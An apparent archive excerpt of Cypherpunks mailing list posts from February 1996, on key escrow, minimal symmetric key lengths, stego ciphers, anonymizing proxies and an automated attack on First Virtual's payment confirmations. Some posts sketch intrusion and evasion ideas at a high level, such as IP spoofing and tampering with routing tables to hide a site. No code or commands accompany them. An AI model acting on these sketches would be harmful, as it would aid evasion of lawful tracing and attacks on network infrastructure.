dictator. One carefully placed packet sniffer and he can automatically 
monitor the conversations of thousands of people, censoring posts he 
doesn't like, and identifying email addresses of thought criminals. 
Although PGP, ssh, and similar tools provide a solution for some, 
traffic analysis makes those who speak privately stand out like a sore 
thumb that needs further investigation. Eric Huges said at Summercon that 
if cryptography is going to work, it needs to be just like Dolby noise 
reduction. Its there, its always on, people don't need to know what it 
does, but it makes things better. (No one stands out like a sore thumb.) 
Although doing this with military grade encryption would be the  
cryto-anarchist's dream, what if we did it with partially escrowed keys? 
The system would have to be designed such that the non-escrowed part 
could be increased with advances in technology. However, a system like 
this would stop the wide spread mass monitoring described above. 
Furthermore, it would allow the government to tap a conversation if it 
was willing to put forth the resources (which will add some visibility 
to an illegal tap). The system would also require one additional 
aspect. It must be impossible to automatically identify messages that 
have partially escrowed keys and messages that are not escrowed. 
Thus, the right of dissent is preserved. Although most software would
only support escrowed keys. 
	Through such a system the net will become a great deal more 
secure from tapping and monitoring. Tapping is possible with a lot of   
work, however it is not assured. Government remains the arm of 
society, yet it can be subverted and destroyed if necessary. Such a 
system brings us to the central question here. Does the government have 
the right to tap conversations, or do the people have a right to keep 
secrets from the government? I think the answer is both. In the end, 
it's very difficult to actually hurt someone with an email message. But, 
nothing ever works in absolutes.

-- 
        */^\*  Tom Cross AKA Decius 615 AKA The White Ninja  */^\* 
                    Decius@montag33.residence.gatech.edu

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCNAzA6oXIAAAEEAJ6ZWl7AwF9rDZhREQ2b9aPxJKL7dxQNx6QQ0pB5o9olvNtG
tIjA47KxWmZAx47m2JEWRgAIaiDHx00dEza5GX4FuFHL7wSXW7qOtqj7CmVLEg4e
0F/Mx0z7Q/aNsn34JrZUWbMLKkAOOB9sJARRynPRVNokAS30ampImlrLbQDFAAUT
tCZEZWNpdXMgNmk1IDxkZWNpdXNAbmluamEudGVjaHdvb2Qub3JnPg==
=0qgN
-----END PGP PUBLIC KEY BLOCK-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lmccarth@cs.umass.edu
Date: Tue, 6 Feb 1996 19:39:36 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Likely application for high-bandwidth proxies (fwd)
Message-ID: <199602060324.WAA09394@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


It would appear that a potentially very popular application for high-
bandwidth anonymizing proxies has arrived: 

Forwarded message from list-managers-digest:
> From: Project Genesis <genesis@j51.com>
> Date: Mon, 05 Feb 1996 02:42:13 -0500
> Subject: Speaking of spams...
> 
> Did I mention that Project Genesis is an organization specializing in
> religious education?  The message below explains why all of our public lists
> are moderated. I value privacy and have grave doubts about things like the
> Exon amendment (which may make Internet providers liable), but I also think
> that we need to ensure that the Internet not become one big red-light
> district. Spams like this are a step in the wrong direction. It hit several
> of our religion-oriented lists.
> 
> Ken
> 
> >Sender: kristina@free.org          [User Unknown - I told her to go away.]
> >Subject: LIVE NUDE VIDEOCONFERENCING!
> >
> >Hi,
> >My name is Kristina.  I'm a nude model and I'd
> >love to take my clothes off and entertain you.
> >You can watch me live and in color on your 
> >computer.  We can type back and forth and I'll
> >be happy to perform your erotic fantasy.  If
> >this sounds like fun, visit the website and
> >download the software. The address is
> >http://www.[I don't plan to help them].com or you can get the
> >software from the BBS at 815-[ditto].  I'll
> >turn the camera on in my studio and wait to 
> >hear from you.  I think you'll like what I have
> >to show you.  This isn't a movie...you make a
> >request and I'll probably fulfill it for you.
> >Look for my picture on the Website.  Hope to 
> >see you soon!
> >
> >Love,
> >Kristina




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 7 Feb 1996 15:08:05 +0800
To: Decius <cypherpunks@toad.com
Subject: Re: Why am I wrong?
Message-ID: <m0tjhAS-0008zxC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 09:54 PM 2/5/96 -0500, Decius wrote:
>I am posting this pondering to cypherpunks in hopes that it will be refuted.
[stuff deleted]
>
>         	            Crypto-Absolutism
>			decius@ninja.techwood.org
[more stuff deleted]

>	On the other hand, we have the crypto-anarchists. They believe 
>that the existence of anonymous transactions will naturally lend itself 
>to a situation where everyone is anonymous, no transaction can be 
>tracked, no communications can be monitored, and basically, no 
>government can possibly control the transactions and interactions of its 
>citizens. They support the broad use of military grade cryptography and 
>anominity. Let no message be crackable or traceable. This, also, is an 
>absolute belief and it is also flawed. We have governments for a 
>reason, we came together and founded societies for protection, and if 
>we tore apart our current social structure and created an anarchy, 
>people would immediately form small societies for their own fiscal 
>protection. Creating an anarchy is a massive step backward in social 
>development, not a step forward. Furthermore, PEOPLE WANT TO BE 
>ACCOUNTABLE FOR THEIR ACTIONS. 

<sigh>  Well, I suppose that if there is anyone who is most opposed to the
opinion you expressed in the paragraph above, it is myself.

I believe:

1.  Governments will no longer be "necessary," if they ever were.

2.  Protection will no longer depend on having a "government."

3.  Anonymous networking technology will protect our rights, to the extent
they can be protected.

4.  Your statement, "...anarchy is a massive step backward..." is absolutely
incorrect.


Note for the others:  I am forwarding this person a copy of my essay.





-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMRb5FfqHVDBboB2dAQFvlQP/Wmsc0OLvEowD3rQ2Rvu2UDcg34ovQt/S
g5HDiraykfk8SpBxyYDWlq+EEO21GssY0w9wmOaf0PKGwk81gZsqqccVpXpJq2Ha
H+ABrgmzCEkiMnL6anFs2RGkZZrlwB2ZGityvV0YZ8HvpP1Ek1Xj0ZD97hYMmYBz
P3gxGE2VCEQ=
=nhzg
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: roy@sendai.cybrspc.mn.org (Roy M. Silvernail)
Date: Tue, 6 Feb 1996 19:14:35 +0800
To: simsong@vineyard.net (Simson L. Garfinkel)
Subject: How would an FV attack fail? (was: Re: FV's blatant double standards)
In-Reply-To: <199602060139.UAA03880@vineyard.net>
Message-ID: <960205.233714.1y9.rnr.w165w@sendai.cybrspc.mn.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In list.cypherpunks, simsong@vineyard.net writes:

> Yes, clearly if you are not concerned about missing 50-75% of First
> Virtual's users, this attack will work just fine.

Could you characterize the failure modes?  I see 2 main ones:

    Confirmation notices directed to another address invisible to the
    successfully infiltrated attacker.

    Failure to initially infiltrate:

        Infiltration attempt failed.

        Potential victim never contacts infection vector.

I'm curious how you'd estimate the breakdown over these modes, and if
you see additional failure modes I've missed.
- -- 
Roy M. Silvernail --  roy@cybrspc.mn.org will do just fine, thanks.
          "Does that not fit in with your plans?"
                      -- Mr Wiggen, of Ironside and Malone (Monty Python)
          PGP public key available upon request (send yours)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMRbrPxvikii9febJAQFxxwP+MjHD4lRb8kMiFF+5DlN4OTZqolyQWlfE
aj2Tk59/FNrOctW4Gqv4b3EkTuLdc1se1CDs/UDQQilmSNiF5cxfJauPVyETQG3H
0NZ5T7wI9WrJp6JVxc4DVwu7aUZwmcDYB6tKPT2ZsH2jhKGz9pUn8kieZt4zM+/7
T0e80OEELvA=
=ZGC2
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Del Torto <ddt@lsd.com>
Date: Wed, 7 Feb 1996 00:19:23 +0800
To: <cypherpunks@toad.com>
Subject: [NOISE] Paranormally Good Privacy
Message-ID: <v03004a0bad3ccc977804@[129.46.82.87]>
MIME-Version: 1.0
Content-Type: text/plain


[  Sorry, but I couldn't resist these excerpts from The mini-Annals of  ]
[  Improbable Research ("mini-AIR" Issue #1996-02, Feb, 1996)  --dave   ]

................................. cut here .................................

-----------------------------------------------------------
1996-02-05	Paranormal Spoon Incident

In the last issue of mini-AIR, we offered, free of charge, to test any
reader who wished to know if he or she has paranormal powers. Testees were
instructed to sit in a quiet corner and mentally send us their names and
addresses. Alas, we had to terminate the testing program after readers in
England and Israel reported a rash of bent spoons and then mentally lodged
police complaints against us. We are now engaged in extra-cognitively
presenting evidence to demonstrate that, whatever is bent or twisted, it is
not the spoons.


-----------------------------------------------------------
1996-02-06	PGP-Y

Our paranormal testing program has already had one commercial spin-off. Our
engineers have developed a truly foolproof data security protocol. It is
called PGP-Y -- "Pretty Good Parasychology." The mechanism is simple. You
imagine that you have transmitted data to someone; that person then
imagines that he has received it. Using PGP-Y, any type of information can
be transmitted over the Internet with complete security. The key is that
the data is transmitted high over the net -- so high that the data actually
travels above the net rather than within it. The data is transmitted
telepathically (and for those who distrust electronic funds, we also have a
scheme for transmitting cash and gold plate telekinetically.)

................................. cut here .................................


--

   dave

_______________________________________________________________
"OK, now everybody who believes in Telekinesis, raise my hand."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@research.att.com>
Date: Tue, 6 Feb 1996 19:19:28 +0800
To: cypherpunks@toad.com
Subject: Report available: "Minimal Key Lengths for Symmetric Ciphers"
Message-ID: <199602060707.CAA01434@nsa.tempo.att.com>
MIME-Version: 1.0
Content-Type: text/plain


At the request of the Business Software Alliance (BSA), an ad hoc
panel of seven cryptologists and computer scientists met last November
to address the question of the minimum key length required to provide
adequate security against exhaustive search in commercial applications
of symmetric cryptosystems.  We have just completed our report.

We adopted a simple, and somewhat conservative, methodology in an
effort to gain a realistic understanding of what size keys might
actually be vulnerable in practice.  It is common in analysis of key
length to give all benefit of the doubt to the capabilities of the
potential attacker and to make very generous assumptions about the
technology and resources that might be available to mount an attack.
In our analysis, however, we assumed that the attacker would employ
only conventional, commercially-mature technologies and would be
limited by budget and time constraints.  We used several different
technologies to design attack strategies that accommodate the budgets
of various hypothetical attackers, from individual ``hackers'' to
well-funded enterprises.  Our conclusions, therefore, represent an
approximation of an ``upper bound'' on the strength of various size
keys; I believe more efficient attacks than those we considered might
also be possible and should be taken into account by the prudent
cryptosystem designer.

The abstract of the report follows below.

A PostScript copy of the full text of the report is available in
     ftp://ftp.research.att.com/dist/mab/keylength.ps
An ASCII version is available in
     ftp://ftp.research.att.com/dist/mab/keylength.txt

(The report will also likely appear on the BSA's web site shortly).

-matt (speaking only for himself)

=======================================================================
	      Minimal Key Lengths for Symmetric Ciphers
	       to Provide Adequate Commercial Security

		    A Report by an Ad Hoc Group of
		Cryptographers and Computer Scientists

			      Matt Blaze (1)
			   Whitfield Diffie (2)
			   Ronald L. Rivest (3)
			    Bruce Schneier (4)
			  Tsutomu Shimomura (5)
			    Eric Thompson (6)
			    Michael Wiener (7)

			     January 1996


			       ABSTRACT

    Encryption plays an essential role in protecting the privacy of
electronic information against threats from a variety of potential
attackers.  In so doing, modern cryptography employs a combination of
_conventional_ or _symmetric_ cryptographic systems for
encrypting data and _public key_ or _asymmetric_ systems for
managing the _keys_ used by the symmetric systems.  Assessing the
strength required of the symmetric cryptographic systems is therefore
an essential step in employing cryptography for computer and
communication security.

    Technology readily available today (late 1995) makes 
_brute-force_ attacks against cryptographic systems considered adequate
for the past several years both fast and cheap.  General purpose
computers can be used, but a much more efficient approach is to employ
commercially available _Field Programmable Gate Array (FPGA)_
technology.  For attackers prepared to make a higher initial
investment, custom-made, special-purpose chips make such calculations
much faster and significantly lower the amortized cost per solution.

    As a result, cryptosystems with 40-bit keys offer virtually no
protection at this point against brute-force attacks.  Even the U.S.
Data Encryption Standard with 56-bit keys is increasingly inadequate.
As cryptosystems often succumb to `smarter' attacks than brute-force
key search, it is also important to remember that the keylengths
discussed here are the minimum needed for security against the
computational threats considered.

    Fortunately, the cost of very strong encryption is not
significantly greater than that of weak encryption.  Therefore, to
provide adequate protection against the most serious threats ---
well-funded commercial enterprises or government intelligence agencies
--- keys used to protect data today should be at least 75 bits long.
To protect information adequately for the next 20 years in the face of
expected advances in computing power, keys in newly-deployed systems
should be at least 90 bits long.

-----------------------------------------
1. AT&T Research, mab@research.att.com
2. Sun Microsystems, diffie@eng.sun.com
3. MIT Laboratory for Computer Science, rivest@lcs.mit.edu
4. Counterpane Systems, schneier@counterpane.com
5. San Diego Supercomputer Center, tsutomu@sdsc.edu
6. Access Data, Inc., eric@accessdata.com
7. Bell Northern Research, wiener@bnr.ca




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Rosenberg" <hal9001@panix.com>
Date: Tue, 6 Feb 1996 15:43:20 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: Arthur C. Clarke Supports Strong Crypto
Message-ID: <v02140b00ad3c89a2fec6@[165.254.158.237]>
MIME-Version: 1.0
Content-Type: text/plain


At 21:06 2/4/96, jim bell wrote:

>At 08:05 PM 2/4/96 -0800, Timothy C. May wrote:
>>
>>(Pardon me for mentioning crypto...)
>>
>>Arthur C. Clarke, known to most of you (author of many SF works, coiner of
>>the phrase: "all sufficiently advanced technlogies are indistinguishable
>>from magic," mention by Alan Olsen yesterday), has a role in a "Discovery
>>Channel" program called "Mysterious Universe."
>
>Actually, it was _I_ who mentioned this quote, but didn't specifically
>recall whom to ascribe it to.

It is known (at least among Science Fiction Fans) as "Clarke's Law" and I
seem to remember it more accurately phrased as "Any sufficiently advanced
technology is indistinguishable from Magic". It is similar to suggesting
that "Magic is any Technology that you do not understand".






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Deranged Mutant <wlkngowl@unix.asb.com>
Date: Wed, 7 Feb 1996 15:07:33 +0800
To: cypherpunks@toad.com
Subject: Re: Telecoms Bill
Message-ID: <199602060748.CAA12211@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

mark@unicorn.com ("Mark Grant, M.A. (Oxon)") wrote:
>
>Well, if "cypherpunks write code", is there any code we should be
>writing in response to this?

I'm not familiar with SSL protocols, but something that would anonymize 
web page access and keep it entirely encrypted (not just credit card or 
forms transactions) would be good.

Encrypted/truly anonymous ftp would be nice (though some folx would 
understandably have problems with truly anonymous uploads, and crypto 
export restrictions in the US could be problematic legally).

I think there is already work on encrypted telnet (stel) by the CERT/IT 
people.

On the non-net side of things, implementing encrypted BBS/communications 
and file-transfers is useful.  I'm told PGP-Phone is supposed to support 
encrypted communications/file-transfers... so a host-script language that 
enables a simple BBS would be nice.

Implementing encrypted/anonymous mailing lists is another idea.

Other ideas?



- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMRcHsioZzwIn1bdtAQHUzwGAwVy5oX7+XwznGkF+CHVXBqeI1dSMT1tt
gNIENdPUnst6bIPvGX4FigUnzEBPiNMH
=gV+C
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Deranged Mutant <wlkngowl@unix.asb.com>
Date: Wed, 7 Feb 1996 15:06:58 +0800
To: cypherpunks@toad.com
Subject: Electronic Grille Cipher?
Message-ID: <199602060826.DAA13336@UNiX.asb.com>
MIME-Version: 1.0
Content-Type: text/plain




An idea occurred to me the other day, for hiding multiple
texts in one file using multiple keys.  The gist of it is to
take a reasonably large file of random data and then to hide
the bytes of a message in scattered locations.  The method of
determining where each byte is would be based on a good cipher
which for each iteration would return a relative offset from
the last location in the file.

It's the electronic form of those ciphers where you have a
message in a grid, the key being random holes punched in a
card and the rest of the boxes filled with junk... I think it's
called a Grille Cipher, right?

If the file is reasonably large and the messages reasonably
small, then multiple messages with multiple keys can be hidden
in the same file.  Thus one passphrase can decrypt an innocuous
message while another decrypts the real message. (Some care
should be taken to make sure there are no collisions.)

If an unencrypted plaintext was intermixed in a "truly random"
file this way, it would be difficult for an attacker to extract
it (though it's nicer to intermix an encrypted file...).

This method could also be applied to stego when hiding a file
in graphics or sound files since an attacker who suspects a
stegoed file would have trouble detecting a PGP header.

Any comments? Has this been thought of before?

--Rob






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Christopher Drake <cnd@triode.apana.org.au>
Date: Tue, 6 Feb 1996 00:47:09 +0800
To: cypherpunks@toad.com
Subject: Intro from a list reader
Message-ID: <199602051620.DAA06735@triode.apana.org.au>
MIME-Version: 1.0
Content-Type: text/plain


Hello,

        My name is Christopher Drake, I own the company NetSafe.  We
        manufacture and sell one product - NetSafe - which prevents one
        small but universally unadressed, serious problem in computer
        security:  We prevent passwords (etc) from being stolen with
        Key Press Password recorders (KPPRs).

        My interest in this list is to stay up-to-date with the industry.

        You may recently have heard of the First Virtual announcement re:
        credit card number theft via automated means: our software specifically
        prevents this.

        Full details can be found at    http://pobox.com/~netsafe

        Interested parties from the recent cypherpunks meeting might
        like to note my public key: after the discussion I finally did it :-)


NetSafe. PO Box 298, North Sydney 2060, Australia.  (24hrs) Tel:+61 2 9966 1995
WWW: http://pobox.com/~netsafe   E-Mail: NetSafe@pobox.com  Fax: (02) 9957 1991

NetSafe provides inexpensive military certified security software to protect 
against key-press password recorders, trojan horses, viruses, etc. Antitamper
antitraceing antidissasembly protection is also included.

>>>>>>>>> Passwords should be protected in a manner that is consistent <<<<<<<<<
>>>>>>>>> with the damage that could be caused by their compromise.    <<<<<<<<<

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.i

mQCNAjD/mQAAAAEEAP/////NetSafe+PGP+key////We+provide+inexpensive
AntiFraud/theft+etc+Security+Software5tGfKREuINIWsQqsLNS+uAneN9M
SuMu37f+NU/U2djtxE/b9h4bJ4wb8h3QkBiuTAS1QjpxpxryQzZ10zzGQe8VAAUR
tChDaHJpc3RvcGhlciBOLiBEcmFrZSA8TmV0U2FmZUBQb2JveC5jb20+
=SGC/
-----END PGP PUBLIC KEY BLOCK-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Michael Peponis" <mianigand@unique.outlook.net>
Date: Wed, 7 Feb 1996 00:22:39 +0800
To: cypherpunks@toad.com
Subject: re Telecoms Bill
Message-ID: <199602060924.DAA08571@unique.outlook.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>Well, if "cypherpunks write code", is there any code we should be
>writing in response to this?

:I'm not familiar with SSL protocols, but something that would anonymize 
:web page access and keep it entirely encrypted (not just credit card or
:forms transactions) would be good.

I think the first problem would be how to hide a sites true location.  For 
example, if I have a domain called xxx.offensivestuff.org, how would I hide the 
sight so that while it is freely accessable to those who are looking for it, 
yet not allow a goverment agency to home in on the geographical locations via 
trace route.

I remember reading a number of articles about floating sites, the only problem 
is with the way Internet routing tables are structured, given that the site 
would constantly spoof different ip's to make it harder to track, or maybe even 
hacking some of the routing tables on the larger gateways, it could cause all 
sorts of problems with traffic.  ie domain xxx.offensivesutt.org has the 
routing information for www.fluffybunnies.com, but if xxx.offensivestuff.com 
moves, then that routining information is invalid. resulting in numerous 
broadbad broadcasts trying to determine the correct route to 
www.fluffybunnies.com.

Additonally, a number of bogus proxie servers could be set up to confuse 
traffic analysis in attempting to determine what the true endpoint of a 
transfer is.

At some point, the data could be encrypted by a proxie server, and sent to the 
final destination.  Thus just like e-mail is reordered by remailers, 
HTTP/FTP/Telnet connections can be shuffled around to foil analysis.

Of course, this approch would result in a slower connection and more packet 
hops.

:Encrypted/truly anonymous ftp would be nice (though some folx would 
:understandably have problems with truly anonymous uploads, and crypto 
:export restrictions in the US could be problematic legally).

Under the forementioned technique, it would not be problematic technically.

:I think there is already work on encrypted telnet (stel) by the CERT/IT 
:people.

I have seen an SSL telnet client source code on hactic I think.

:On the non-net side of things, implementing encrypted BBS/communications 
:and file-transfers is useful.  I'm told PGP-Phone is supposed to support 
:encrypted communications/file-transfers... so a host-script language that 
:enables a simple BBS would be nice.

I like this idea, but I am not sure how the laws work.  For example if a BBS 
had subscribers sign a voucher stating that they were not agent of a goverment 
agency, would it hold up? would lying constitue entapment?

If not, then yes, encrypting the data would provide protection becasue no one 
would be able to detect what was being passed.  under this approch 
 information gained by wiretapping would not be usefull.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMRau2EUffSIjnthhAQHnhgP/SgH4SA6yKRlkgnJ198jw2SBaZ5SqsNRF
YYtyHWeWcGqf30ghoe20Bvfug7oaJrB5jO+fqJ6DiL5Wp2onmWL6MTrReEpt7q1t
8ESRgyO/ndVDBhiQHWxLY1tynVBJxUbCrxvMHyPtpTIRXQtZsFlM6Iw8lndbnUbK
RofiuhFzDlU=
=n9n+
-----END PGP SIGNATURE-----
Regards,
Michael Peponis
PGP Key Avalible form MIT Key Server,or via finger




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Deranged Mutant <wlkngowl@unix.asb.com>
Date: Tue, 6 Feb 1996 19:02:05 +0800
To: cypherpunks@toad.com
Subject: Re: re Telecoms Bill
Message-ID: <199602061038.FAA12752@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

mianigand@unique.outlook.net ("Michael Peponis") wrote:

>I think the first problem would be how to hide a sites true location.  >For example, if I have a domain called xxx.offensivestuff.org, how would
>I hide the sight so that while it is freely accessable to those who are
>looking for it, yet not allow a goverment agency to home in on the
>geographical locations via trace route.

That's a problem... data havens come to mind, but that's another issue.
Keeping the data in a domain/country where it is not restricted, or where
laws are very laxly enforced is one start... then the issue is using
crypto so that one can get the material from a country that restricts
it.

[Off topic... DC Nets/Anonymous or encrypted IRC comes to mind too...]

[..]
>Of course, this approch would result in a slower connection and more >packet hops.

A price for maintaining security and anonyimity...

[..]
>:On the non-net side of things, implementing encrypted >:BBS/communications and file-transfers is useful.  I'm told PGP-Phone
[..]
>
>I like this idea, but I am not sure how the laws work.  For example if a >BBS had subscribers sign a voucher stating that they were not agent of a
>goverment agency, would it hold up? would lying constitue entapment?

It wouldn't work, and would make them more interested in the material
that BBS has.  Any what about DMV/DOT employees, clerks, firemen, 
hospital employees, etc., who are non-enforcement people?

Encryption would restrict wiretapping.  If users send private encrypted
email to each other (Isn't there a PBBS program that allows users to
PGP-encrypt private mail to each other...?) that's another layer of
security.  Keeping the BBS on an encrypted partition also helps.

BBS's aren't as prone to snooping as networks are, but then again, why
should government employees be the only type of snooper?

The comm program could also implement a kind of zero-knowledge proof
or digital sig rather than the standard login, making the BBS secure
against someone hacking an account.



- --Rob

Just some suggestions to dilute the noise ratio...


- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMRcvjyoZzwIn1bdtAQGl2gF+INNeeX6GH9oX/8KSB0NPIi2ifzDuBVSu
d2fwPoAmiJ3ds7mzBPCn3msATxaCROFd
=kPGx
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathaniel Borenstein <nsb@nsb.fv.com>
Date: Tue, 6 Feb 1996 19:50:47 +0800
To: jpp@software.net>
Subject: Re: FV's blatant double standards
In-Reply-To: <2.2.32.19960205213944.0109c138@mail.software.net>
Message-ID: <cl5nmoeMc50eIYnJg9@nsb.fv.com>
MIME-Version: 1.0
Content-Type: text/plain


I've debunked this one before, but let me say it again.  John outlines
essentially the same scheme for an automated attack on FV that was
previously posted by Jeff Weinstein at Netscape.  (Actually, to be fair,
Jeff's was considerably more sophsticated in its attempt to avoid
detection by FV.)  John's approach will essentially change all negative
FV confirmation answers to positive ones.  There are a couple of key
flaws in his approach:

1.  He doesn't explain how he's going to spot the VirtualPIN in the
outgoing stream.  Given the non-structured nature of the VirtualPIN,
this alone probably requires more sophistication than our entire attack
program.

2.  He acknowledges that this approach will miss anyone who isn't buying
things from the machine that actually composes his mail messages.  What
he doesn't seem to realize, however, is that this means that any
automated attack will cause "fraud" to be called as soon as it hits a
user of AOL, Compuserve, etc.  Jeff's approach would last a bit longer,
but is also vulnerable to heterogeneous mail environments.  The real
point is that an automated attack like this one is undermined by email
heterogeneity, which will cause FV's fraud department to be alerted
quite quickly & trace things down.  In contrast, the attack we've
outlined on credit card numbers is simple, single-step, and has no
obvious "misfiring path" that would lead to quick detection.  It could
do its dirty work for a long time.  

Simson's comment almost, but not quite, made this clear:

> Yes, clearly if you are not concerned about missing 50-75% of First Virtual's 
> users, this attack will work just fine.

The "just fine" is incorrect, however, because those 50-75% will not be
MISSED, they will be attacked incompletely, and they will object to
false transactions, causing our fraud department to launch an
investigation.  This attack would get stopped pretty quickly, I believe.
 -- Nathaniel
--------
Nathaniel Borenstein <nsb@fv.com>
Chief Scientist, First Virtual Holdings
FAQ & PGP key: nsb+faq@nsb.fv.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Tue, 6 Feb 1996 19:05:55 +0800
To: Bill Humphries <Bill.Humphries@msn.fullfeed.com>
Subject: CypherPunks as Teachers; source material [Re: Hey, we are quaint! , (Was: A Sign of the Future)]
In-Reply-To: <v01530501ad3c5337c614@[199.184.183.25]>
Message-ID: <Pine.BSD.3.91.960206055653.5857G-100000@usr6.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain



	I agree:

	    "Cypherpunks Teach"
		Bill Humphries <Bill.Humphries@msn.fullfeed.com> 

    --the only way to get the message across.

	Jeffersonians?  Publicly, Jefferson espoused universal suffrage 
    for all Freemen as opposed to Madison-Hamilton-Federalists. Both sides
    had a fully "republican" bi-cameral legislature with separate executive
    and justice branches for the checks and balances.
	Jefferson differed in his approach to social issues: far more 
    empathetic than the Federalists who could exhibit traits of feudalism 
    rather easily. In his writings, etc. Jefferson could be considered a
    nascent libertarian.  How today's Democratic Party can claim 
    Jefferson as their founding father is certainly past my comprehension.

	The following are reprintings of excellent books:

            Works of Fisher Ames, as published by Seth Ames, W.B. Allen,
	editor, Indianapolis: Liberty Fund, two volumes, 1,708 pages,
	hardcover, $30.00. 
            Democracy and Liberty, by William Edward Hartpole Lecky,
	Indianapolis:  Liberty Fund, two volumes, 1,025 pages, hardcover,
	$20.00. 
    
    and well worth the read, despite their size. Lecky was a historian 
    with perspective, not a revisionist.  Excellent coverage of the fallacy
    of democracies starting with the Greek city-states. Ames was an American
    statesman (graduated from Harvard Law at 16) and was a Representative
    from Massachusetts in the first Congress thru 1799 when his ill-health
    forced retirement. In his writings, he states:

	    Democracy means the absolute reign of "public opinion," the
	disappearance of the rule of law, and the sweeping away of
	protections built into a true government of law. 

	Jefferson certainly would role over at the degeneration of "his"
    party which began in the 30s as liberal news, particularly radio,
    demagougues discovered they could fan the riff-raff and control the
    direction of government. 
	With Democratic control of the house all but six years from 1932
    to 1994 (48-54) and Democratic Presidents for all but 20 of 60 years: 
    [Eisenhower (if he was a Republican), Nixon-Ford, Reagan and Bush], 
    the cynical press effectively rewrote the modus operandi of the
    Federal government; with the advent of nationwide televison in the 
    late 50s --the deed was done.  Roosevelt started with "...a chicken 
    in every pot" but today that is a a piker --you need two cars in the 
    garage, TVs in every room, etc. or as quipped once (Butts on the way 
    to his media crucifixion): "...loose shoes, a tight pussy, and a warm
    place to shit."
	
	I have an excellent review of both books by Fr. James Thorton
    Notre Dame, I think.

	Anyone who would like a copy of the review, mail a blank message 
    with the Subject: DEM_lib and it shall be sent.

	Both texts clearly define what the problem is today even though 
    both are over 100 years old. the survivors of their length will have
    a clear understanding of limited republics and rabble-run democracy,
    and with Leaky's work, some excellent historical references.

	attila

On Mon, 5 Feb 1996, Bill Humphries wrote:

> Steve Levy replied to Alex Strasheim over an alledged 'plot' to discredit
> cypherpunks at Wired Magazine:
> 
> >Give me a break.  I do not work for Wired but I write for them at times,
> >and most often my subject is crypto related.
> 
> [...]
> 
> >On Mon, 5 Feb 1996, Alex Strasheim wrote [citing Gary Wolf 'channeling
> >McLuhan']:
> >
> >> >     Concerns about privacy and anonymity are outdated. Cypherpunks
> >> >     think they are rebels with a cause, but they are really senti-
> >> >     mentalists.
> >>
> >> I'm not much for big conspiracy theories, but I like the little ones.
> 
> <rant>
> 
> Hey folks, we are quaint Jeffersonians for the most part here. We believe
> that reasoned arguement should carry the day instead of FUD (fear,
> uncertainty and doubt). And that privacy is a good thing. Whereas modern,
> marketing driven media (as described by McLuhan) will use FUD and whatever
> else it takes to deliver an audience. Ask any of the people who have been
> publicly tarred as Nazi's for their involvement over the Zundel/Hollow
> Earth/webcom business.
> 
> Wolf's portrayal of McLuhan is spot on, because media producers who give a
> damn about anonymity and privacy aren't going to land the big contracts.
> The money to buy bandwidth and servers wants the highest quality data
> availiable so we can be coerced to spend every minute we aren't working,
> commuting, sleeping, or fornicating (was f*cking before the CDA) as
> 'consumers.'
> 
> And many people aren't going to think of these issues, not because they are
> dumb, but because they are so busy working to provide for their families to
> spend any time in the reflective/meditative state required to make
> political choices.
> 
> I suggest that Cypherpunks add one more slogan to their list:
> 
>                "Cypherpunks teach."
> 
> Because no one is going to invest in the time and effort to use PGP,
> remailers, and blind web proxies unless they understand why they should.
> I'm going to invest in the time to show my family and friends why these
> technologies are important so when I mention PGP to someone they'll have
> something other than the soundbite "only Nazis use strong encryption" to
> fall back on.
> 
> </rant>
> 
> bill.humphries@msn.fullfeed.com
> "The more you know, the more jokes you get" -- Tompkins and Kaufman
> 
> 

__________________________________________________________________________
    go not unto usenet for advice, for the inhabitants thereof will say:
      yes, and no, and maybe, and I don't know, and fuck-off.
_________________________________________________________________ attila__

    To be a ruler of men, you need at least 12 inches....
    There is no safety this side of the grave.  Never was; never will be.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
